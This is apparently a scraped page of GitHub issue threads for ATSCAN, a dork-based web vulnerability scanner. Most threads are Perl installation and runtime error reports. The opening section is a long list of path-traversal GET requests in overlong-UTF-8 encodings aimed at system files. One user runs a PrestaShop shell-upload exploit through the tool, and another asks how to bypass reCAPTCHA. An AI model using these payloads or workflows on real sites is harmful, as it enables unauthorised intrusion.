    GET /Shared/controller/text.ctrl.php HTTP/1.0"
    GET /ShowImage.php?name=../../../../../../../../etc/passwd HTTP/1.0"
    GET /SilverStream HTTP/1.0"
    GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.0"
    GET /SilverStream/Pages HTTP/1.0"
    GET /Site/biztalkhttpreceive.dll HTTP/1.0"
    GET /SiteServer/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwindows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C0%AF../..%C0%AF../..%C0%AF../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C0%AF../.:%C0%AF../..%C0%AF../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C0%AF../.:%C0%AF../..%C0%AF../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwindows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwindows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%9v..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%9v..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%9v../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%9v../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af../..%c0%af../..%c0%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af../..%c0%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af../..%c0%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%qf..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%qf..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%qf../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c0%qf../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%1c..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%1c..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%1c../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%1c../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%8s..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%8s..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%8s../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%8s../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%9c..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%9c..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%9c../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%9c../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af..%c1%af/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%af..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%af..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%pc..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%pc..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%pc../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%c1%pc../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af..%e%80%af/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e%80%af..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e%80%af..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e0%80%af../..%e0%80%af../..%e0%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e0%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%e0%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af..%f0%80%80%80%af/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%80%af..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%80%af..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af/windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af/winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%af..../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%af..../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f0%80%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f8%80%80%80%af../windows/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%f8%80%80%80%af../winnt/system32/ipconfig.exe HTTP/1.0"
    GET /SiteServer/..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af..%fc%80%80%80%80%af../windows/system32/ipconfig.exe HTTP/1.0"

Ps: maximum is 65536 characters :(

Urls (Dorks) Search

Hi ! first i must thank you for this powerful tool and your work , Thanks sir !
in your recent video ATscan V1 + SQLMAP Exploit
you tried to search Urls (Dorks) on a specific website , i couldn't find this option in Atscan V12

Logo design

Hi, I'm a logo designer I just saw your project and if you want I can design a logo for your project. So, what do you say?

Error

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
\C no longer supported in regex; marked by <-- HERE in m/(\ <-- HERE C)/ at /usr/share/perl5/URI/Escape.pm line 205.
Compilation failed in require at /usr/share/atscan//atscan.pl line 7.
BEGIN failed--compilation aborted at /usr/share/atscan//atscan.pl line 7.

save file

there is a problem in --save it save nothing

Termux

Geolocate IP doesn't work and also some others on Termux so not sure if I will be using it but if you want to try to fix them check the Proxy ones work for me it didn't and also no error
Command:
perl ./atscan.pl -t ?.?.?.? --geoloc
Error:
Undefined subroutine &Subs::geoSrver called at ./atscan.pl line 432.

Can't locate Term/ReadKey.pm in @INC

Can't locate Term/ReadKey.pm in @inc (you may need to install the Term::ReadKey module) (@inc contains: /usr/share/atscan/inc/lib/lib /usr/share/atscan/inc/lib /etc/perl /usr/local/lib/arm-linux-gnueabihf/perl/5.30.0 /usr/local/share/perl/5.30.0 /usr/lib/arm-linux-gnueabihf/perl5/5.30 /usr/share/perl5 /usr/lib/arm-linux-gnueabihf/perl/5.30 /usr/share/perl/5.30 /usr/local/lib/site_perl /usr/lib/arm-linux-gnueabihf/perl-base) at /usr/share/atscan/inc/lib/lib/Login.pm line 6.
BEGIN failed--compilation aborted at /usr/share/atscan/inc/lib/lib/Login.pm line 6.
Compilation failed in require at /usr/share/atscan//atscan.pl line 122.
BEGIN failed--compilation aborted at /usr/share/atscan//atscan.pl line 122.

Apikey

I tried the solution of

atscan --config
set apikey with my cse id but whenever i want to search for a dork it gives me an error for internet conecction.

Can you please add info for how to add apikey for google custom search, cse and cx apis? And also for shodan please as permanantely.

At older versions of atscan, we didnt have to add an api key and everything was working flawlessly.
Thank you.

googleapis google cache does not bring results

json error has been fixed! thanks but now another problem it doesn't bring results even if i change dork Screenshot_20200524-173257
the other search engines work normally!
Screenshot_20200524-173351
Screenshot_20200524-173319

googleapis google cache does not bring results
and yes my api and cx are configured
so much that atscan checks before doing the search!
IMG_20200524_174712_043

video

Thanks for tool. Works well. But please provide video tutorial in order to save time of many people

Error on execution

I receive this error on execution:

Undefined subroutine &main::headerSearch called at ./atscan.pl line 1814

when I type: ./atscan.pl --dork inurl:index.php?id= --level 40 --xss

Strangely it worked well yesterday but I had to re-install ATSCAN because I ran a live version of Kali. I also tried to run it from my server but receive the same error. Is it patched or something? I find it really weird. Any help would be very appreciated!

set command in interactive mode

set command .... breaks after first space and does not add the complete command(see screenshot)
Am i doing something wrong?
nocommand

installation error

im not Perl familiar ,

Can't locate URI/Escape.pm in @INC (you may need to install the URI::Escape module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.22.1 /usr/local/share/perl/5.22.1 /usr/lib/x86_64-linux-gnu/perl5/5.22 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.22 /usr/share/perl/5.22 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base .) at /usr/share/atscan//atscan.pl line 7.

atscan error

Hi when i do example perl atscan.pl --dork inurl:".php?cat="intext:"Buy Now" --level 100 --exp --%27 --valid SQL i reciever this error
[!] [5:26:48] [24/106]
[!] TARGET: http://hackingforum.ru/showthread.php?tid=23273
Use of uninitialized value in subroutine entry at atscan.pl line 993.
Bad arg length for Socket::inet_ntoa, length is 0, should be 4 at atscan.pl line 993.
How i can resolve that for complete scan ? And how i can get more result for dork why when i text on google inurl:".php?cat="intext:"Buy Now" i get 185.000 result and with atscan when i set level 1000 i get just 248 result and stop to work at [72/248] ? Thanks :)

not working..

sir.. after update its giving error..
root@kali:~# atscan -h

      . \\\|||/// 
     / \ ========
     \ /| O   O | 
      #  \` _ '/            -oO Alisam Technology Oo-
     (#)   | |   
      #\/( * * )\          _  _____ ____   ____    _    _   _  
      #\/(==*==)/         / \|_   _/ ___| / ___|  / \  | \ | |
      #   || ||          / _ \ | | \___ \| |     / _ \ |  \| |
     .#---'| |`----.    / ___ \| |  ___) | |___ / ___ \| |\  |
     '#---'   `----'   /_/   \_\_| |____/ \____/_/   \_\_| \_| V 16.0.6

Can't locate JSON.pm in @inc (you may need to install the JSON module) (@inc contains: /etc/perl /usr/local/lib/i386-linux-gnu/perl/5.28.1 /usr/local/share/perl/5.28.1 /usr/lib/i386-linux-gnu/perl5/5.28 /usr/share/perl5 /usr/lib/i386-linux-gnu/perl/5.28 /usr/share/perl/5.28 /usr/local/lib/site_perl /usr/lib/i386-linux-gnu/perl-base) at /usr/share/atscan/inc/search/process.pl line 93.
BEGIN failed--compilation aborted at /usr/share/atscan/inc/search/process.pl line 93.
Compilation failed in require at /usr/share/atscan/inc/includes.pl line 62.
Compilation failed in require at /usr/share/atscan//atscan.pl line 86.

Bugtraq error + NO target url shown

I tried to uninstall and reinstall whole package but didnt work.
I could never run the tool due to the following errors:
1st)
Use of uninitialized value in concatenation (.) or string at /usr/share/atscan/inc/lib/Bugtraq.pm line 142.
2nd) NO target url shown

Example use: atscan --bugtraq --dork "inurl:index.php?id=" --level 1
Output as image attached
atscan

atscan -h error

hi, when i type
atscan -h i have that ???

syntax error at /usr/share/atscan/inc/help.pl line 40, near "."
Compilation failed in require at /usr/share/atscan/inc/conf/main.pl line 97.
Compilation failed in require at /usr/share/atscan/inc/index.pl line 11.
Compilation failed in require at /usr/share/atscan/inc/includes.pl line 60.
Compilation failed in require at /usr/share/atscan//atscan.pl line 105.

an idea ???

ty

I am learning to use Atscan | السلام قال لك

Hi Friend,

Is this a correct way to try an external script and shell upload?

atscan --dork 'inurl:/modules/productpageadverts/' -m 2 -l 10 --command "proxychains perl /root/stuff/tools/PRESTA-modules-shell-exploit/PRESTA-modules-shell-exploit.pl --TARGET /root/stuff/tools/shellz/worst_sh.php"

Can any one share more commands to use with atscan...i am learning to use this super tool!

Thx in advance

Using on termux

When I try to run it it gives me the logo but also an error
Undefined subroutine &Print::basename called at /data/data/com.termux/files/home/ATSCAN/inc/lib/lib/Print.pm line 107.
Can someone help me?

issue to get different TARGET from external command

When I search and I use: --command "curl -sv --TARGET", the first target is fixed to all results.
For every result, the command always use the first result target

Selection_999(359)
As you can see, the second result, use the same first url.
How can I fix this issue?

--exp, --expHost, --payload seems not working for me

For example I try to use this simple command:
atscan -d "product.php?product_id=" -l 1 --exp "product.php?product_id=rang(1-20)" -m google
I get in output just Target and IP for every dork result, --exp... part not done. I tried also --expHost, --host --exp, nothing works for me. Ofcourse I tried other --exp commands too, many from youtube examples, also example from this repo: atscan -d "/index.php?id=" --expHost "/index.php?id=rang(1-9)" --sql -l 1. Please advice.

how to run an external command on every search hit

Hello,

as you described in issue: issue to get different TARGET from external command #43, the --TARGET value is fix for one related host. I also tried the --command option with the the mode --HOST. But i also get the the same behavior, that every external command on different search hits is execute with the first finding from the search engine.

Let me please know, how to manage your program, that i can run an external command on every search hit. If it is not possible yet, this would be a very essentially feature.

thanks!

Google search is not working

Hello @AlisamTechnology happy new year ❤️ 🎄
when i run this command :
perl atscan.pl -m google -d 'site:.gov.' --level 2

--------------------------------------------------------------------------------
[::] DORK        [site:.gov.]
[::] LEVEL       [2]
[::] ENGINES     [google]
--------------------------------------------------------------------------------
[!] Please wait...

[10:06:16] [:::] STARTING SEARCH ENGINE SCAN ...
--------------------------------------------------------------------------------
[!] 0 Unique Result(s) Found!

i think google search not working
also i found regex may work with google pages : <a href="(.*?)" data-ved=

what is worng with my command ?
and there's way to bypass google recapatcha ?
also i think after some uncompleately tests when recapatcha appears when i purge cache and delete cookies recapatcha is gone without solve it

and when i try to use googleapis with this command
perl atscan.pl -d 'site:.gov.' -s urls.txt --source output_sources --level 100 --apikey <MyApiKey> --cx <MyCx> -m googleapis

--------------------------------------------------------------------------------

[!] Checking apikey connection... OK

--------------------------------------------------------------------------------
[::] DORK        [site:.gov.]
[::] LEVEL       [100]
[::] ENGINES     [googleapis]
--------------------------------------------------------------------------------
[!] Please wait...

[11:22:21] [:::] STARTING SEARCH ENGINE SCAN ...
--------------------------------------------------------------------------------
**Can't use an undefined value as an ARRAY reference at /home/kali/Desktop/ATSCAN/inc/lib/Search.pm line 133.**

this error appers .

مشكله

scream@ADWAA:/mnt/c/users/ad/desktop/Tools/ATSCAN-master$ atscan --bugtraq joomla

     /\ ___ /\
    (  o   o  )             https://www.fb.com/Alisam.Technology
    \  >#<  /
     /       \            _  _____ ____   ____    _    _   _
    /         \   ^      / \|_   _/ ___| / ___|  / \  | \ | |
   |           | ||     / _ \ | | \___ \| |     / _ \ |  \| |
    \          /-//    / ___ \| |  ___) | |___ / ___ \| |\  |
     ///  ///--       /_/   \_\_| |____/ \____/_/   \_\_| \_| V 14.0.3

Disclaimer: Using ATSCAN to Attack targets without prior mutual consent is
illegal! It is your own responsibility to obey laws! Alisam Technology is
not linked to any kind of loss or misuse or damage caused by this program!



[!] Please wait...
[!] No results found!
[19:57:32] EXPLORING [joomla] ISSUES...
[i] 0 Results found!
[!] [19:57:36] SCAN FINISHED!!
scream@ADWAA:/mnt/c/users/ad/desktop/Tools/ATSCAN-master$

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.